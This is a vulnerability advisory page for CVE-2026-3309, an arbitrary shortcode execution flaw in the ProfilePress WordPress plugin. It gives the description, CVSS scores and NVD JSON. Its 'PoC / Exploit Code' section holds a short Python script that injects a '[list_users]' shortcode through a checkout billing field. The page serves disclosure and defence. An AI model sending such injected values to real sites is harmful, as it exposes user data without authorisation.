Security Vulnerability Report
δΈ­ζ–‡
CVE-2026-3309 CVSS 6.5 MEDIUM

CVE-2026-3309

Published: 2026-04-04 12:16:03
Last Modified: 2026-04-24 18:13:29
Source: [email protected]

Description

The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 4.16.11. This is due to the plugin allowing user-supplied billing field values from the checkout process to be interpolated into shortcode template strings that are subsequently processed without proper sanitization of shortcode syntax. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes by submitting crafted billing field values during the checkout process.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

ProfilePress <= 4.16.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # PoC for CVE-2026-3309: Arbitrary Shortcode Execution in ProfilePress # Target: WordPress sites with ProfilePress <= 4.16.11 TARGET_URL = "http://example.com/checkout/" # The payload injects a shortcode to list users (or any other available shortcode) # Attackers can use other shortcodes to extract data or perform actions payload_data = { "billing_first_name": "[list_users]", "billing_last_name": "Attacker", "billing_email": "[email protected]", "billing_phone": "1234567890", "pp_checkout_submit": "1" } try: response = requests.post(TARGET_URL, data=payload_data) if response.status_code == 200: print("[+] Payload sent successfully.") print("[+] Check the response or site logs for execution results (e.g., user list).") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3309", "sourceIdentifier": "[email protected]", "published": "2026-04-04T12:16:03.237", "lastModified": "2026-04-24T18:13:28.877", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 4.16.11. This is due to the plugin allowing user-supplied billing field values from the checkout process to be interpolated into shortcode template strings that are subsequently processed without proper sanitization of shortcode syntax. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes by submitting crafted billing field values during the checkout process."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3471623%40wp-user-avatar%2Ftrunk&old=3447273%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3f8f083e-0de2-42a5-b289-101ec53aa44c?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.